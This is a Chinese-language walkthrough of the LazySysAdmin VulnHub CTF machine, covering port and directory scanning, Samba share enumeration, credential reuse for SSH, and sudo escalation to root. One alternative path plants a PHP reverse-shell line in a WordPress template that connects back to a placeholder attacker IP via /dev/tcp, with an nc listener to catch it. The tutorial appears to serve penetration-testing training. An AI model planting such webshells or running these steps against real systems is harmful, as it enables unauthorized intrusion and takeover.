LazySysAdmin CTF 渗透测试实战教程<\/h1>

环境概述<\/h2>

LazySysAdmin 是一个 VulnHub 上的 CTF 靶机，设计用于练习渗透测试技能。该靶机运行在 Ubuntu 系统上，提供了多种服务，包括：<\/p>

Web 服务 (Apache 2.4.7)<\/li>
Samba 文件共享 (4.3.11-Ubuntu)<\/li>
MySQL 数据库 (未授权访问)<\/li>
SSH 服务 (OpenSSH 6.6.1p1)<\/li>

IRC 服务 (InspIRCd)<\/li> <\/ul>

初始信息收集<\/h2>

1. 目标发现<\/h3>

使用 netdiscover<\/code> 扫描本地网络，发现目标 IP 地址：<\/p>

netdiscover -i wlo1
<\/span><\/span><\/code><\/pre>输出显示目标 IP 为 192.168.0.100<\/code>，MAC 地址为 08:00:27:da:8a:ac<\/code>。<\/p>
2. 端口扫描<\/h3>
使用 masscan<\/code> 进行快速端口扫描：<\/p>
masscan 192.168.0.100 -p 1-10000 --rate=<\/span>1000<\/span>
<\/span><\/span><\/code><\/pre>发现开放端口：22(SSH)、80(HTTP)、139\/445(SMB)、3306(MySQL)、6667(IRC)。<\/p>
使用 nmap<\/code> 进行详细扫描：<\/p>
nmap -T4 -A -v 192.168.0.100 -p 0-10000
<\/span><\/span><\/code><\/pre>详细服务信息：<\/p>

22\/tcp: OpenSSH 6.6.1p1 Ubuntu<\/li>
80\/tcp: Apache 2.4.7 (Ubuntu)<\/li>
139\/tcp: Samba smbd 3.X - 4.X<\/li>
445\/tcp: Samba smbd 4.3.11-Ubuntu<\/li>
3306\/tcp: MySQL (未授权访问)<\/li>
6667\/tcp: InspIRCd<\/li>
<\/ul>
Web 服务渗透<\/h2>
1. 目录扫描<\/h3>
使用 dirb<\/code> 扫描 Web 目录：<\/p>
.\/dirb http:\/\/192.168.0.100 wordlists\/common.txt -o result.txt
<\/span><\/span><\/code><\/pre>发现重要目录：<\/p>

\/phpmyadmin\/<\/code> - MySQL 管理界面<\/li>
\/wordpress\/<\/code> - WordPress 站点<\/li>
\/info.php<\/code> - PHP 信息页面<\/li>
<\/ul>
2. robots.txt 分析<\/h3>
访问 http:\/\/192.168.0.100\/robots.txt<\/code> 发现以下受限目录：<\/p>
User-agent: *
Disallow: \/old\/
Disallow: \/test\/
Disallow: \/TR2\/
Disallow: \/Backnode_files\/
<\/code><\/pre>
3. WordPress 扫描<\/h3>
使用 wpscan<\/code> 扫描 WordPress：<\/p>
wpscan http:\/\/192.168.0.100\/wordpress
<\/span><\/span><\/code><\/pre>发现：<\/p>

WordPress 版本 4.8.5 (已过时)<\/li>
注册功能开启<\/li>
上传目录和包含目录有目录遍历漏洞<\/li>
<\/ul>
Samba 共享渗透<\/h2>
1. 枚举 Samba 共享<\/h3>
使用 enum4linux<\/code> 枚举 Samba 信息：<\/p>
enum4linux 192.168.0.100
<\/span><\/span><\/code><\/pre>发现：<\/p>

共享目录：print$<\/code>、share$<\/code>、IPC$<\/code><\/li>
用户：togie<\/code> (Unix User)<\/li>
<\/ul>
2. 访问共享<\/h3>
Linux 下挂载共享：<\/p>
mount -t cifs -o username=<\/span>''<\/span>,password=<\/span>''<\/span> \/\/192.168.0.100\/share$ \/mnt
<\/span><\/span><\/code><\/pre>发现重要文件：<\/p>

deets.txt<\/code> - 包含 MySQL 凭据<\/li>
wp-config.php<\/code> - WordPress 配置文件<\/li>
<\/ul>
MySQL 数据库渗透<\/h2>
从共享文件中获取 MySQL 凭据：<\/p>

用户名：root<\/code><\/li>
密码：TogieMYSQL12345^^<\/code><\/li>
<\/ul>
尝试访问 phpMyAdmin，但权限受限。<\/p>
SSH 渗透<\/h2>
1. 凭据尝试<\/h3>
从共享文件中发现密码 12345<\/code>，结合 WordPress 页面显示的 "My name is togie"，尝试 SSH 登录：<\/p>
ssh togie@192.168.0.100
<\/span><\/span><\/code><\/pre>使用密码 12345<\/code> 成功登录。<\/p>
2. 权限提升<\/h3>
检查当前用户权限：<\/p>
whoami  # togie<\/span>
<\/span><\/span>id      # uid=1000(togie) gid=1000(togie) groups=...<\/span>
<\/span><\/span><\/code><\/pre>发现 togie<\/code> 有 sudo 权限：<\/p>
sudo su
<\/span><\/span><\/code><\/pre>输入密码 12345<\/code> 后成功获取 root 权限。<\/p>
替代渗透路径<\/h2>
1. WordPress 管理员登录<\/h3>
使用 MySQL 凭据登录 WordPress 后台：<\/p>

用户名：Admin<\/code><\/li>
密码：TogieMYSQL12345^^<\/code><\/li>
<\/ul>
2. 上传 Webshell<\/h3>
编辑 404.php 模板，插入 PHP 反弹 shell 代码：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>exec<\/span>("\/bin\/bash -c 'bash -i >& \/dev\/tcp\/攻击者IP\/1234 0>&1'"<\/span>);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>访问触发页面获取 shell：<\/p>
nc -vlp 1234<\/span>
<\/span><\/span><\/code><\/pre>3. 提权<\/h3>
获取的 www-data shell 无 tty，使用 Python 生成 tty：<\/p>
python -<\/span>c 'import pty; pty.spawn("\/bin\/sh")'<\/span>
<\/span><\/span><\/code><\/pre>检查系统信息：<\/p>
uname -r              # 4.4.0-31-generic<\/span>
<\/span><\/span>lsb_release -a        # Ubuntu 14.04.5 LTS<\/span>
<\/span><\/span><\/code><\/pre>可使用 CVE-2017-1000112 进行提权（需本地编译 exp）。<\/p>
总结<\/h2>
本 CTF 的关键渗透路径：<\/p>

通过 Samba 共享获取 MySQL 凭据<\/li>
结合 WordPress 信息获取 SSH 凭据<\/li>
利用 sudo 权限直接提权<\/li>
<\/ol>
替代路径：<\/p>

通过 WordPress 后台上传 webshell<\/li>
获取 www-data shell 后利用内核漏洞提权<\/li>
<\/ol>
附录：工具安装<\/h2>
dirb 安装<\/h3>
wget https:\/\/svwh.dl.sourceforge.net\/project\/dirb\/dirb\/2.22\/dirb222.tar.gz
<\/span><\/span>tar zxvf dirb222.tar.gz
<\/span><\/span>cd dirb222\/
<\/span><\/span>apt-get install libcurl4-gnutls-dev
<\/span><\/span>.\/configure &&<\/span> make
<\/span><\/span><\/code><\/pre>参考链接<\/h2>

VulnHub 下载页面<\/li>
相关 CVE 漏洞信息<\/li>
渗透测试工具官方文档<\/li>
<\/ul>
通过本教程，您可以全面了解从信息收集到权限提升的完整渗透测试流程，掌握多种渗透技巧和工具使用方法。<\/p>

LazySysAdmin CTF 渗透测试实战教程<\/h1>

初始信息收集<\/h2>

Web 服务渗透<\/h2>

Samba 共享渗透<\/h2>

SSH 渗透<\/h2>

附录：工具安装<\/h2>

参考链接<\/h2> VulnHub 下载页面<\/li> 相关 CVE 漏洞信息<\/li> 渗透测试工具官方文档<\/li> <\/ul> 通过本教程，您可以全面了解从信息收集到权限提升的完整渗透测试流程，掌握多种渗透技巧和工具使用方法。<\/p>

参考链接<\/h2>

VulnHub 下载页面<\/li>
相关 CVE 漏洞信息<\/li>
渗透测试工具官方文档<\/li> <\/ul>
通过本教程，您可以全面了解从信息收集到权限提升的完整渗透测试流程，掌握多种渗透技巧和工具使用方法。<\/p>